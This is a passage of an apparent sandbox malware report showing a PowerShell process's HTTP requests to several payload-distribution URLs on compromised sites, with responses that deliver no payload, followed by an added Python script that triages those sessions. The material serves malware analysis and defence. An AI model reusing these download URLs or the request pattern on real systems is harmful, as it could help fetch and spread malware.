                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 20 2d 20 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 63 79 72 69 6c 6c 69 63 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 34 66 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 37 34 37 34 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 
74 2d 73 69 7a 65 3a 20 39 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 32 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 62 72 69 65 66 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0a 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 63 65 6c 6c 3b 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 70 61 64 64 69 6e 67 3a 20 30 20 34 30 70 78 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 20 77 69 64 74 68 3a 20 35 32 30 70 78 3b 22 3e 0a 20 20 20
Data Ascii: <!doctype html><html><head> <title>403 Forbidden - Страница заблокирована</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'> <style> body { background-color: #f1f4f5; color: #37474f; line-height: 1.4; font-family: 'Open Sans', sans-serif; margin: 0; padding: 0; } .error_code { display: block; font-size: 92px; font-weight: 700; margin-top: -25px; } .error_brief { display: block; font-size: 18px; font-weight: 700; margin-bottom: 15px; } </style></head><body><div style="display: table; position: absolute; height: 100%; width: 100%;"> <div style="display: table-cell; vertical-align: middle; padding: 0 40px;"> <div style="margin-left: auto; margin-right: auto; width: 520px;">
(The title's Cyrillic, dropped by the ASCII rendering but present in the raw bytes d0 a1 d1 82 ... d0 b0, reads "Страница заблокирована", Russian for "Page blocked": the host serving this first download URL already returns a block page, so no payload was retrieved here.)
Mar 16, 2021 14:27:10.732588053 CET | 800 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6c 6f 61 74 3a 6c 65 66 74 3b 20 77 69 64 74 68 3a 32 30 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32
Data Ascii: <div style="float:left; width:200px; text-align: center; padding-right: 20px;"> <span class="error_code">403</span> <span class="error_description">Forbidden</span> </div> <div s


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49724 | 151.106.5.169 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Mar 16, 2021 14:27:14.990628958 CET | 1391 | OUT | GET /847346324234234/rpnvXm/ HTTP/1.1
Host: tongdaihanoi.com
Connection: Keep-Alive
Mar 16, 2021 14:27:15.043883085 CET | 1392 | IN | HTTP/1.1 200 OK
                                                                                                                        cache-control: max-age=0, private, must-revalidate
                                                                                                                        connection: close
                                                                                                                        content-length: 495
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        date: Tue, 16 Mar 2021 13:27:14 GMT
                                                                                                                        server: nginx
                                                                                                                        set-cookie: sid=529043ec-865b-11eb-ad9b-19c8d4ec230d; path=/; domain=.tongdaihanoi.com; expires=Sun, 03 Apr 2089 16:41:22 GMT; max-age=2147483647; HttpOnly
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 74 6f 6e 67 64 61 69 68 61 6e 6f 69 2e 63 6f 6d 2f 38 34 37 33 34 36 33 32 34 32 33 34 32 33 34 2f 72 70 6e 76 58 6d 2f 3f 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 78 4e 54 6b 77 4f 44 51 7a 4e 53 77 69 61 57 46 30 49 6a 6f 78 4e 6a 45 31 4f 54 41 78 4d 6a 4d 31 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 63 47 31 6b 59 6a 63 31 4d 6a 5a 6e 5a 6d 68 72 61 6d 64 31 63 54 41 77 4d 6a 46 72 5a 57 67 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4d 54 55 35 4d 44 45 79 4d 7a 55 73 49 6e 52 7a 49 6a 6f 78 4e 6a 45 31 4f 54 41 78 4d 6a 4d 31 4d 44 4d 79 4d 44 55 30 66 51 2e 4c 48 64 7a 58 67 35 6a 37 61 32 2d 4a 53 5f 68 73 73 53 78 4f 43 79 74 36 45 56 52 70 43 75 32 64 4e 33 78 61 4c 58 51 50 4f 34 26 73 69 64 3d 35 32 39 30 34 33 65 63 2d 38 36 35 62 2d 31 31 65 62 2d 61 64 39 62 2d 31 39 63 38 64 34 65 63 32 33 30 64 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                        Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://tongdaihanoi.com/847346324234234/rpnvXm/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxNTkwODQzNSwiaWF0IjoxNjE1OTAxMjM1LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycG1kYjc1MjZnZmhramd1cTAwMjFrZWgiLCJuYmYiOjE2MTU5MDEyMzUsInRzIjoxNjE1OTAxMjM1MDMyMDU0fQ.LHdzXg5j7a2-JS_hssSxOCyt6EVRpCu2dN3xaLXQPO4&sid=529043ec-865b-11eb-ad9b-19c8d4ec230d');</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49725 | 35.209.212.48 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Mar 16, 2021 14:27:15.489614010 CET | 1393 | OUT | GET /wp-includes/ciAjcgj/ HTTP/1.1
Host: opheliasbrewery.com
Connection: Keep-Alive
Mar 16, 2021 14:27:15.649028063 CET | 1395 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Tue, 16 Mar 2021 13:27:15 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        X-Httpd: 1
                                                                                                                        Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                        X-Proxy-Cache: HIT
                                                                                                                        Data Raw: 31 34 36 65 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 
3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 77 68 69 74 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 7d 0a 20 20 20 20 2e 74 69 74 6c 65 20 7b 20 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 61 75 74 6f 20 31 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 74 69 74 6c 65 2d 2d 72
                                                                                                                        Data Ascii: 146e6<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 - Not found</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700%7CRoboto:400,700" rel="stylesheet"><style> * { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: transparent; } body { margin: 0; padding: 0; height: 100%; -webkit-text-size-adjust: 100%; } .fit-wide { position: relative; overflow: hidden; max-width: 1240px; margin: 0 auto; padding-top: 60px; padding-bottom: 60px; padding-left: 20px; padding-right: 20px; } .background-wrap { position: relative; } .background-wrap.cloud-blue { background-color: #b0e0e9; } .background-wrap.white { background-color: #fff; } .title { position: relative; text-align: center; margin: 20px auto 10px; } .title--r
Mar 16, 2021 14:27:15.649059057 CET | 1396 | IN | Data Raw: 65 67 75 6c 61 72 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0a 20 20 20 20 2e 74 69 74 6c 65 2d 2d 73 69 7a 65 2d 6c 61 72 67 65 20 7b 20 66 6f 6e 74
Data Ascii: egular { font-family: 'Roboto', Arial, sans-serif; } .title--size-large { font-size: 36px; line-height: 46px; } .title--size-semimedium { font-size: 20px; line-height: 28px; } .title--weight-normal { font-weight: 400; } .title-
Mar 16, 2021 14:27:15.649075031 CET | 1397 | IN | Data Raw: 6f 76 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 69 64 3d 22 61 63 63 65 37 36 37 30 2d 39 30 34 66 2d 34 66 38 63 2d 62 38 36 37 2d 36 38 31 33 38 63 32 66 38 63 30 36 22 20 64 61 74 61 2d 6e 61 6d
Data Ascii: over"> <svg id="acce7670-904f-4f8c-b867-68138c2f8c06" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1019 467"><title>404_bg</title><path d="M962.794,62.029a11.471,11.471,0,0,1-.656-22.923h0a11.471,11.4
Mar 16, 2021 14:27:15.649091005 CET | 1399 | IN | Data Raw: 2e 38 35 31 6c 32 34 2e 33 35 36 2c 31 33 2e 36 30 37 61 31 2c 31 2c 30 2c 30 2c 31 2d 2e 30 33 38 2c 31 2e 37 36 37 6c 2d 32 34 2e 39 32 36 2c 31 32 2e 35 33 32 41 31 2e 30 30 36 2c 31 2e 30 30 36 2c 30 2c 30 2c 31 2c 37 37 33 2e 33 31 36 2c 32
Data Ascii: .851l24.356,13.607a1,1,0,0,1-.038,1.767l-24.926,12.532A1.006,1.006,0,0,1,773.316,228.33Zm1.535-25.456-.5,22.815,21.756-10.938Z" fill="#226d7a"/><path d="M136.509,150.348l-2.39-8.09a7.115,7.115,0,1,0-1.9.629l2.372,8.028a1,1,0,0,0,.959.717,1,1,0
Mar 16, 2021 14:27:15.649156094 CET | 1400 | IN | Data Raw: 34 31 33 41 37 2c 37 2c 30 2c 31 2c 30 2c 31 31 2c 32 36 35 63 2e 30 38 2c 30 2c 2e 31 35 38 2d 2e 30 30 39 2e 32 33 37 2d 2e 30 31 32 6c 32 2e 32 31 39 2c 37 2e 39 35 61 31 2c 31 2c 30 2c 30 2c 30 2c 31 2e 39 32 37 2d 2e 35 33 38 5a 4d 36 2c 32
Data Ascii: 413A7,7,0,1,0,11,265c.08,0,.158-.009.237-.012l2.219,7.95a1,1,0,0,0,1.927-.538ZM6,258a5,5,0,1,1,5,5A5.006,5.006,0,0,1,6,258Z" fill="#226d7a"/><path d="M39.924,315.537l-7.936-2.293c0-.082.012-.162.012-.244a7.008,7.008,0,0,0-7-7c-.08,0-.158.009-.
Mar 16, 2021 14:27:15.649173021 CET | 1401 | IN | Data Raw: 39 2c 31 2c 31 2c 30 2c 30 2c 30 2c 2e 32 37 36 2d 31 2e 39 36 31 6c 2d 37 2e 39 32 34 2d 32 2e 32 39 61 37 2c 37 2c 30 2c 31 2c 30 2d 31 31 2e 39 31 38 2c 32 2e 39 36 35 6c 2d 36 2e 30 30 36 2c 35 2e 38 32 34 61 31 2c 31 2c 30 2c 31 2c 30 2c 31
Data Ascii: 9,1,1,0,0,0,.276-1.961l-7.924-2.29a7,7,0,1,0-11.918,2.965l-6.006,5.824a1,1,0,1,0,1.392,1.436L48.408,223A6.952,6.952,0,0,0,52,224Zm0-12a5,5,0,1,1-5,5A5.006,5.006,0,0,1,52,212Z" fill="#226d7a"/><path d="M122,281a6.984,6.984,0,0,0-1.218.113l-2.36
Mar 16, 2021 14:27:15.649194002 CET | 1403 | IN | Data Raw: 37 2e 32 37 38 2d 35 2e 32 39 34 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 31 37 36 2c 31 2e 36 31 38 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 39 35 2e 37 2c 31 39 38 2e 33 36 36 61 31 2c 31 2c 30 2c
Data Ascii: 7.278-5.294a1,1,0,0,0-1.176,1.618Z" fill="#226d7a"/><path d="M995.7,198.366a1,1,0,0,0-1.176,1.617l7.28,5.293a.986.986,0,0,0,.587.192,1,1,0,0,0,.588-1.809Z" fill="#226d7a"/><path d="M1002.5,232.72a1,1,0,0,0-1.366.365l-4.5,7.793a1,1,0,1,0,1.732,
Mar 16, 2021 14:27:15.649211884 CET | 1404 | IN | Data Raw: 2e 32 37 31 2d 2e 30 31 34 6c 32 2e 35 37 36 2c 37 2e 38 37 39 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 39 35 2e 36 39 2e 39 38 35 2e 39 38 35 2c 30 2c 30 2c 30 2c 2e 33 31 2d 2e 30 35 2c 31 2c 31 2c 30 2c 30 2c 30 2c 2e 36 34 2d 31 2e 32 36 31 6c 2d
Data Ascii: .271-.014l2.576,7.879a1,1,0,0,0,.95.69.985.985,0,0,0,.31-.05,1,1,0,0,0,.64-1.261l-2.492-7.624A7.007,7.007,0,0,0,879,113Zm-7,5a5,5,0,1,1,5-5A5.006,5.006,0,0,1,872,118Z" fill="#226d7a"/><path d="M1012,205a7,7,0,0,0-2.469,13.542l-3.9,6.75a1,1,0,1
Mar 16, 2021 14:27:15.649286985 CET | 1405 | IN | Data Raw: 2e 36 32 31 20 31 34 33 2e 39 30 34 20 31 33 31 2e 37 33 34 20 31 34 35 2e 37 34 32 20 31 33 33 2e 38 34 38 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 34 35 2e 37 34 32 20 31 32 32 2e 30 34
Data Ascii: .621 143.904 131.734 145.742 133.848" fill="#fff"/><polygon points="145.742 122.041 147.581 119.928 145.742 117.814 143.904 119.928 145.742 122.041" fill="#fff"/><polygon points="145.742 110.235 147.581 108.122 145.742 106.008 143.904 108.122
Mar 16, 2021 14:27:15.649306059 CET | 1407 | IN | Data Raw: 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 36 36 2e 32 38 38 20 39 34 2e 32 30 32 20 31 36 34 2e 34 35 20 39 36 2e 33 31 36 20 31 36 36 2e 32 38 38 20 39 38 2e 34 32 39 20 31 36 38 2e 31 33
Data Ascii: " fill="#fff"/><polygon points="166.288 94.202 164.45 96.316 166.288 98.429 168.13 96.316 166.288 94.202" fill="#fff"/><polygon points="168.128 84.51 166.288 82.396 164.45 84.51 166.288 86.624 168.128 84.51" fill="#fff"/><polygon points="176.5
Mar 16, 2021 14:27:15.803983927 CET | 1408 | IN | Data Raw: 20 31 39 35 2e 32 36 38 20 31 33 31 2e 37 33 34 20 31 39 37 2e 31 31 20 31 33 33 2e 38 34 38 20 31 39 38 2e 39 34 38 20 31 33 31 2e 37 33 34 20 31 39 37 2e 31 31 20 31 32 39 2e 36 32 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79
Data Ascii: 195.268 131.734 197.11 133.848 198.948 131.734 197.11 129.621" fill="#fff"/><polygon points="197.11 117.814 195.268 119.928 197.11 122.041 198.948 119.928 197.11 117.814" fill="#fff"/><polygon points="197.11 106.008 195.268 108.122 197.11 110
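None of the three plain-HTTP sessions above returned a binary: the first host answers 403 with a block page, the second answers 200 but its 495-byte body is only a JavaScript redirect carrying a signed token (a non-browser client such as the PowerShell stage does not execute it), and the third answers 404. The script below is an added example, not part of the Joe Sandbox report, that reconstructs this triage from the captured transcripts: it re-implements the report's "HTTP GET or POST without a user agent" check over the raw request text, classifies each response, and decodes the claims of the token in the redirect without verifying its HS256 signature (the key is server-side and not available). SESSIONS is constructed from the transcripts above with the HTML bodies shortened; the verdict strings are this script's own.

```python
"""Triage of the three plain-HTTP download attempts in the HTTP Packets section.
Added example; not part of the Joe Sandbox report.  SESSIONS is constructed from
the captured request lines, status lines and bodies shown above (bodies shortened
to what the checks need).  The JWT in session 1 is decoded WITHOUT signature
verification: it is HS256 and the key lives on the server."""
import base64
import json
import re
from urllib.parse import parse_qs, urlsplit

SESSIONS = [
    {
        "url": "http://cherkashchanu.com/Z:/4ZE8/",
        "request": "GET /Z:/4ZE8/ HTTP/1.1\r\nHost: cherkashchanu.com\r\nConnection: Keep-Alive\r\n\r\n",
        "status": 403,
        "content_type": "text/html",
        "body": "<!doctype html><html><head><title>403 Forbidden</title></head><body></body></html>",
    },
    {
        "url": "http://tongdaihanoi.com/847346324234234/rpnvXm/",
        "request": "GET /847346324234234/rpnvXm/ HTTP/1.1\r\nHost: tongdaihanoi.com\r\nConnection: Keep-Alive\r\n\r\n",
        "status": 200,
        "content_type": "text/html; charset=utf-8",
        "body": (
            "<html><head><title>Loading...</title></head><body>"
            "<script type='text/javascript'>window.location.replace("
            "'http://tongdaihanoi.com/847346324234234/rpnvXm/?js="
            "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
            "eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxNTkwODQzNSwiaWF0IjoxNjE1OTAxMjM1LCJpc3MiOiJKb2tlbiIs"
            "ImpzIjoxLCJqdGkiOiIycG1kYjc1MjZnZmhramd1cTAwMjFrZWgiLCJuYmYiOjE2MTU5MDEyMzUsInRzIjox"
            "NjE1OTAxMjM1MDMyMDU0fQ."
            "LHdzXg5j7a2-JS_hssSxOCyt6EVRpCu2dN3xaLXQPO4"
            "&sid=529043ec-865b-11eb-ad9b-19c8d4ec230d');</script></body></html>"
        ),
    },
    {
        "url": "http://opheliasbrewery.com/wp-includes/ciAjcgj/",
        "request": "GET /wp-includes/ciAjcgj/ HTTP/1.1\r\nHost: opheliasbrewery.com\r\nConnection: Keep-Alive\r\n\r\n",
        "status": 404,
        "content_type": "text/html",
        "body": '<!DOCTYPE html><html lang="en"><head><title>404 - Not found</title></head><body></body></html>',
    },
]

REDIRECT_RE = re.compile(r"window\.location\.replace\('([^']+)'\)")


def request_headers(raw_request):
    """Lower-cased header map of a raw HTTP request (request line excluded)."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def lacks_user_agent(raw_request):
    """The report's 'HTTP GET or POST without a user agent' signature over raw text."""
    return "user-agent" not in request_headers(raw_request)


def _b64url_decode(segment):
    # JWT segments drop base64url padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token):
    """Return (header, claims) of a compact JWS; the signature is NOT checked."""
    header, claims, _signature = token.split(".")
    return json.loads(_b64url_decode(header)), json.loads(_b64url_decode(claims))


def js_redirect_target(html):
    """URL passed to window.location.replace(...) in a response body, if any."""
    match = REDIRECT_RE.search(html)
    return match.group(1) if match else None


def classify(session):
    """Coarse verdict on whether a download attempt produced a payload."""
    if session["status"] != 200:
        return "no payload: HTTP %d" % session["status"]
    body = session["body"]
    if body.startswith("MZ"):
        return "PE payload"
    if js_redirect_target(body):
        return "JavaScript redirect (no payload for a non-browser client)"
    return "HTML body, no redirect"


def triage():
    """Per-URL verdict plus the missing User-Agent check, as a dict keyed by URL."""
    return {s["url"]: {"user_agent_missing": lacks_user_agent(s["request"]),
                       "verdict": classify(s)} for s in SESSIONS}


def redirect_claims():
    """Claims carried by the ?js= token in session 1's redirect (unverified)."""
    target = js_redirect_target(SESSIONS[1]["body"])
    token = parse_qs(urlsplit(target).query)["js"][0]
    return decode_jwt_unverified(token)[1]


if __name__ == "__main__":
    for url, result in triage().items():
        print(url, result)
    print(redirect_claims())
```

The decoded claims show an HS256 token issued and audienced "Joken" with a two-hour lifetime (exp minus iat), a js flag and a nonce-like jti, which is what a JavaScript gate in front of the URL would hand to a browser; the recorded transcript contains only that redirect, so the sandbox run retrieved no second-stage payload from this host.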


                                                                                                                        HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
